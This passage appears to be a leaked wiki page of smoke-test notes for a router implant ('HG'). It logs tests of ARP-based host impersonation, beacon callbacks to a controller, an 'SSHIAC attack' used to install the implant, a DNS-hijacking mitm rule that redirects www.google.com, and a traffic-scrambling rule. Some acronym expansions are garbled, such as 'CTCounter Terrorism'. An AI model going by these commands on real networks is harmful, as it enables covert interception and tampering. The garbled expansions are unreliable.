      3. Listen window: socket get_arp_survey_data
        1. Note: Less IP/MAC entries than previously since table is repopulating
      4. Start IXIA JQJThresher test with 150 hosts in network neighborhood
        1. cmd: socket get_arp_survey_data
          1. = ARPAddress Resolution Protocol table is populated with IXIA traffic
          2. Note: only the most recent 32 addresses show in the survey
  15. CPU Scaling - Smoke Test

    1. Ensured CPU scaling was disabled - device cpu show
    2. Created a collect rule for all traffic to create high CPU and CPU interrupts
      1. collect create 0.0.0.0 0.0.0.0 0 0 0.0.0.0 0.0.0.0 0 0 tcp -en
    3. Started IXIA traffic test to generate traffic to raise the COU
      1. Noted CPU levels
        1. CPU utilization for five seconds: 22%/11%; one minute: 14%; five minutes: 9%
      2. Enabled CPU scaling and noted CPU levels

        1. device cpu set_bounds 5 10

        2. CPU utilization for five seconds: 5%/13%; one minute: 5%; five minutes: 5%

    4. Found that CPU scaling does not seem to affect the second number for the 5 second CPU (the interrupt level).  I believe this is a known issue, but need to double check.

    5. Found that the output of a show proc cpu sorted reveals that the sum total of the CPU used is more than the total being reported at the top.  I believe this is a known issue, but need to double check.

  16. CA - Smoke Test

    1. Issued "ca reboot" in ICON-CT
      1. Target Device rebooted
      2. Target Device reports in show version output: Last reset from power-on and System returned to ROMRead-Only Memory by power-on
      3. No crashinfo file generated
      4. No alerting snmp traps or syslogs on console during reboot
    2. Issued a ca reboot while ca soft kill was in effect - no alerting snmp traps or syslog messages generated, target device reloaded
  17. CA Soft Kill test

    1. Issued "ca kill soft 5 60"
      1. ICMP packets were dropped for the duration of the soft kill and resumed normally
      2. CT session remained responsive
      3. No alerting syslog messages seen on console
      4. Packets resumed passing on schedule
    2. Issued "ca soft kill 5 300"
      1. reloaded Target Device during kill duration, device reloaded normally
      2. Re-attacked with sshiac and installed HG and established CTCounter Terrorism session- snmp trap for config change observed during IACInternational Access Code attack
        1. snmp traps all enabled with the exception of syslog traps, traps enabled to be sent to Solarwinds
        2. SSHIAC attack and observe the SNMPSimple Network Management Protocol message:
          CISCO-CONFIG-MAN-MIB:ciscoConfigManEvent 
  18. Smoke Test - socket get_arp_responder_status

    1. Established a CTCounter Terrorism session using seeds host as trigger and then verified that arp responder was enabled but not used for current connection
    2. Disconneced CTCounter Terrorism session and took seeds host offline
    3. Restablished CTCounter Terrorism session with snooping and checked the arp responder activity - it was still not used
    4. Disconnected CTCounter Terrorism session and cleared arp on Target Device and reconnected CTCounter Terrorism session - it still was not used
    5. Disconnected CTCounter Terrorism session and attempted to reestablish and force it to use a non existent host to impersonate - would not connect
      1. attempted both beacon_call_me_back and beacon_call_base_back with -ii 192.168.21.40
      2. wireshark shows HG attempt to make an ssl cx to CT, CTCounter Terrorism sends 4 syn-acks, then HG sends another SYN
      3. Is arp responder not getting the arp request or not responding for 192.168.21.40?
      4. Cleared arp on 2960#1 as well as upstream 3750, and now using Seeds host IP no longer works for CTCounter Terrorism session
      5. Turned up seeds host interface and sent a ping to it from the 3750 and then the interface on Seeds back down - this repopulated the 3750 arp table with and entry for 192.168.21.10
      6. Attempted to establish CTCounter Terrorism session impersonating 192.168.21.10 and it works
      7. Cleared arp on 3750 while CTCounter Terrorism session was active, and the session drops.  Turned int on Seeds back up and tried to reestablish CTCounter Terrorism session impersonating seeds IP and it works.
      8. Seems that arp_responder isn't responding for 192.168.21.10
    6. Attempted to connect a CTCounter Terrorism session and force HG to impersonate a real host - works
    7. Allowed HG to snoop to impersonate traffic, but disabled seeds host interface eth1 and cleared arp on 3750 before attempting to establish the CTCounter Terrorism session.  Session established using ARPAddress Resolution Protocol responder.  Repeated this test using both beacon call_me_back https 172.20.12.22 443 and beacon call_me_back https 443 - sessions both established using ARPAddress Resolution Protocol responder.
  19. DIVRT Smoke Test

    1. Created a DIVRTDigital Imaging & Video Recovery Team rule in HG
      1. mitm create dns_replace_ip 192.168.21.11 255.255.255.0 4.4.4.4 255.255.255.0 www.google.com:172.20.13.20 -en -ttl 1
    2. Tested from 192.168.21.11 (windex target) and saw that DNSDomain Name System responses were modified to reply with 172.20.13.20.  Captured in wireshark and verified the modified DNSDomain Name System reply, used web browser and received the web page from 172.20.13.20 when browsing to www.google.com
    3. Added an additional rule for the same DNSDomain Name System request, but with a different modified response - behaved as iframe did - both rules were accepted however only lowest numbered rule took effect.
    4. Deleted lowest numbered rule and now the remaining rule took effect
    5. Attempted to delete the mitm rule while a session was active, HG gave an error to say a session was active, the rule will be deleted when all sessions are complete.
    6. Verified that after session was complete, rule was deleted.
    7. Stopped and started FilterBroker module, and then re-entered rule.  Verified rule still taking effect on Victim.
    8. Disabled and deleted mitm rule
  20. MixMaster

    1. scramble create random_data 192.168.21.10 255.255.255.0 0 0 0.0.0.0 0.0.0.0 0 0 tcp -en
    2. Observed seed traffic impacted by scramble rule at times, however the results we got were not consistent.  Need to continue testing scramble to determine why at times a rule that should have worked did not fire.  Could be related to IXIA traffic or number of rules.
    3. Observed matched packets in output of scramble status to be too high - looks like it's counting return traffic as well as traffic that matches our rule

Previous versions:

| 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 [Xetron] | 24 [Xetron] | 25 [Xetron] | 26 [Xetron] | 27 [Xetron] | 28 [Xetron] | 29 [Xetron] | 30 [Xetron] | 31 [Xetron] | 32 [Xetron] | 33 [Xetron] | 34 [Xetron] | 35 [Xetron] | 36 [Xetron] | 37 [Xetron] | 38 [Xetron] | 39 [Xetron] | 40 [Xetron] | 41 [Xetron] | 42 [Xetron] | 43 [Xetron] | 44 [Xetron] | 45 [Xetron] | 46 [Xetron] | 47 [Xetron] | 48 [Xetron] | 49 [Xetron] | 50 [Xetron] | 51 [Xetron] | 52 [Xetron] | 53 [Xetron] | 54 [Xetron] | 55 [Xetron] |

e-Highlighter

Click to send permalink to address bar, or right-click to copy permalink.

Un-highlight all Un-highlight selectionu Highlight selectionh